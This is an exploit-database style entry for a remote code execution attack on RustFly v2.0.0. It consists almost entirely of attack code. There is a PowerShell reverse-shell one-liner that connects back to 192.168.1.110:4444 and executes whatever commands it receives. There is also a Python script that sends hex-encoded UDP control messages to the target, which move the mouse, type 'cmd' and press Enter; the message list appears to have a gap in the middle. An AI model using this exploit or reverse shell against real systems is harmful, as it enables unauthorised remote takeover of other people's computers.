RustFly v2.0.0- Remote Code Execution (RCE)

# Exploit Title: RustFly v2.0.0- Remote Code Execution (RCE)
# Date: 2025-05-29
# Exploit Author: tmrswrr
# Software Link: https://bixat.dev/products/rustfly
# Platform: Multiple
# Version: v2.0.0
# Tested on: Windows 10


#powershell -nop -c "$c=New-Object
System.Net.Sockets.TCPClient('192.168.1.110',4444);$s=$c.GetStream();[byte[]]$b=0..65535|%{0};while(($i=$s.Read($b,0,$b.Length))
-ne 0){;$d=(New-Object -TypeName
System.Text.ASCIIEncoding).GetString($b,0,$i);$r=iex $d
2>&1;$s.Write((New-Object -TypeName System.Text.ASCIIEncoding).GetBytes($r
+ 'PS > '),0,($r + 'PS > ').Length)}"


import socket
import time

target_ip = "192.168.1.107"
target_port = 5005

messages = [
    "6D6F76653A2D35352C31303530",  # move:-55,1050
    "646F75626C655F636C69636B",     # double_click
    "746578743A636D64",             # text:cmd
    "6B65793A656E746572",           # key:enter


    "6B65793A656E746572",           # key:enter
]
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.bind(("", 0))
sock.settimeout(5)

try:
    for msg in messages:
        sock.sendto(bytes.fromhex(msg), (target_ip, target_port))
        print(f"[+] Sent: {bytes.fromhex(msg).decode('ascii',
errors='ignore')}")
        time.sleep(1)

except socket.timeout:
    print("[-] Timeout.")

finally:
    sock.close()